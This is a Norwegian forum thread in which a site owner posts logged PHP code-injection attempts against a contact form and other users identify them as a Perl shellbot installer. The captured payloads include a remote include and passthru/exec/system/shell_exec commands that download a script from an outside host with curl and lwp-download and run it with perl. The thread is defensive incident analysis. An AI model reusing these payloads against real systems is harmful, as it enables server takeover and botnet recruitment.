Forsøk på hacking?

En tråd i 'PHP, SQL og databaser' startet av hakonv, 28 Jul 2010.

  1. hakonv New Member

    Innlegg:
    2
    Hei alle.

    Jeg hører egentlig til i .Net verdenen. Det skjer fra tid til annen at det dukker opp forsøk på hacking. Og nå tikket det nettop 4 mystiske forespørsler inn på en av disse .Net sidene. Nå ble jeg litt nyskjerrig, i tillegg til at det sikkert er kjekt for noen av dere å bla litt ekstra i loggene i kveld.


    Klienten identifiserer seg som "plaNETWORK Bot Search" og kommer fra 72.249.108.140 (ISP: Colo4Dallas LP , Organization: Beach Trader )
    Requestene kommer som HttpPost til en gyldig aspx-side med "++%2fcontact.php" lagt til på enden av querystringen.

    Formene ser slik ut (kuttet opp for enklere lesbarhet, php-Code her kommer fordi det er omkranset med PHP i brackets.):

    Form 1:
    send-contactus : 1
    author_name :
    PHP:
    echo('plaNETWORK ');passthru('uname -a');
    echo(
    ' kae');die();

    Form2:
    send-contactus : 1
    author_name :
    PHP:
    include('http://qikel.fileave.com/ingwe.txt??');
    die();

    Form3:
    end-contactus : 1
    author_name :
    PHP:
    passthru('cd /var/tmp;cd /tmp;lwp-download http://wan5.fileave.com/dos.txt ;
    perl dos.txt;curl -O http://wan5.fileave.com/dos.txt -O dos.txt;
    perl dos.txt'
    );
    exec('cd /var/tmp;cd /tmp;lwp-download http://wan5.fileave.com/dos.txt ;perl dos.txt;curl -O http://wan5.fileave.com/dos.txt -O dos.txt;perl dos.txt');
    system('cd /var/tmp;cd /tmp;lwp-download http://wan5.fileave.com/dos.txt ;perl dos.txt;curl -O http://wan5.fileave.com/dos.txt -O dos.txt;perl dos.txt');
    shell_exec('cd /var/tmp;cd /tmp;lwp-download http://wan5.fileave.com/dos.txt ;perl dos.txt;
    curl -O http://wan5.fileave.com/dos.txt -O dos.txt;perl dos.txt'
    );;
    die();
    Form 4:

    send-contactus : 1
    author_name :
    PHP:
    passthru('cd /var/tmp;cd /var/tmp;cd /tmp;lwp-download http://wan5.fileave.com/dos.txt ;perl dos.txt;curl -O http://wan5.fileave.com/dos.txt -O dos.txt;perl dos.txt');
    exec('cd /var/tmp;cd /var/tmp;cd /tmp;lwp-download http://wan5.fileave.com/dos.txt ;perl dos.txt;curl -O http://wan5.fileave.com/dos.txt -O dos.txt;perl dos.txt');
    system('cd /var/tmp;cd /var/tmp;cd /tmp;lwp-download http://wan5.fileave.com/dos.txt ;perl dos.txt;curl -O http://wan5.fileave.com/dos.txt -O dos.txt;
    perl dos.txt'
    );
    shell_exec('cd /var/tmp;cd /var/tmp;cd /tmp;lwp-download http://wan5.fileave.com/dos.txt ;perl dos.txt;
    curl -O http://wan5.fileave.com/dos.txt -O dos.txt;perl dos.txt'
    );;
    die();
    Noen som har sett dette før?
     
  2. Nutz

    Nutz Med lem

    Innlegg:
    1.139
    Helt klart forsøk på installasjon av et perl-script. :)
    Perl:Shellbot.. mao gjør serveren din til et verktøy for for å føkke opp for andre bla.
     
    Tonny Kluften liker dette.
  3. Pong

    Pong Jeg selger sʇɥƃıluʍop :)

    Innlegg:
    3.459
    Det er nok en ide å sende en liten epost til de som drifter fileave.com.
    Filene ligger der fremdeles: FileAve.com - wan5's files
     
  4. Jan W. Medlem

    Innlegg:
    136
    Om du ser litt på dette scriptet:
    ..så ser du hva som kan skje.

    Crackeren har tydeligvis tatt høyde for det meste.

    Om du googler navnet hans, dukker det opp litt av hvert.
     
  5. hakonv New Member

    Innlegg:
    2
    Takk for innspill

    Da har jeg sendt mail til fileave.com, og bedt dem om å fjerne filene.
     
    Tonny Kluften liker dette.
  6. clinton4

    clinton4 Medlem

    Innlegg:
    1.258
  7. Nutz

    Nutz Med lem

    Innlegg:
    1.139
    Fila er "bare" en tekstfil med perl-scriptet, det er helt avhengig av å bli startet/kjørt av "loaderen". Harmløst så lenge det ikke blir startet, og det blir det ikke bare med å trykke på den linken.
    På en "normal" PC vil man ikke kunne kjøre et Perl-script, dette er nok mer målretta for servere.
     

Del denne siden